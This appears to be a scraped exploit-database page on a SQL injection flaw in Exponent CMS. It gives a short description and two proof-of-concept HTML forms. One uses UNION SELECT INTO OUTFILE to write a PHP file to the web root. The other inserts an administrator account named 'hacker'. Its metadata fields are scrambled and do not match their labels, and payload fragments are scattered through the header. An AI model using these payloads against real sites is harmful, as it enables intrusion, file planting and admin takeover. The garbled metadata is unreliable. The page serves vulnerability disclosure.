header-logo
Suggest Exploit
vendor:
Fixed by Vendor
by:
is_admin) VALUES (\""hacker\""
MD5(\""hacker\"")
CVSS
1)' -- ""><input type=""hidden"" name=""username"" value=""' UNION SELECT 'INSERT INTO users (username
SQL Injection [CWE-89]
1)' -- ""><input type=""submit"" id=""btn""></form>"
CWE
Product Name: Fixed by Vendor
Affected Version From: 2013
Affected Version To: High-Tech Bridge Security Research Lab
Patch Exists: HIGH
Related CWE: MD5(\""hacker\"")
CPE: CVE-2013-3294, CVE-2013-3295
Metasploit: 2.2.0 beta 3
Tags: None
CVSS Metrics: https://www.exploit-db.com/raw/25518
Nuclei References: Online Innovative Creations
Nuclei Metadata: Exponent CMS
Platforms Tested: YES
password

SQL Injection in Exponent CMS

The vulnerability exists due to insufficient filtration of "src" and "username" HTTP GET parameters passed to "/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. Depending on database and system configuration, the PoC (Proof-of-Concept) code below will create a "/var/www/file.php" file with PHP function 'phpinfo()': <form action="http://[host]/index.php" method="post" name="main"><input type="hidden" name="action" value="login"><input type="hidden" name="int" value="1"><input type="hidden" name="module" value="login"><input type="hidden" name="password" value="password"><input type="hidden" name="src" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- "><input type="hidden" name="username" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- "><input type="submit" id="btn"></form> The second PoC will attempt to creaate a new administrative user with username "hacker" and password "hacker": <form action="http://[host]/index.php" method="post" name="main"><input type="hidden" name="action" value="login"><input type="hidden" name="int" value="1"><input type="hidden" name="module" value="login"><input type="hidden" name="password" value="password"><input type="hidden" name="src" value="' UNION SELECT 'INSERT INTO users (username, password, is_admin) VALUES ("hacker""

Mitigation:

7.57.6
Source

Exploit-DB raw data: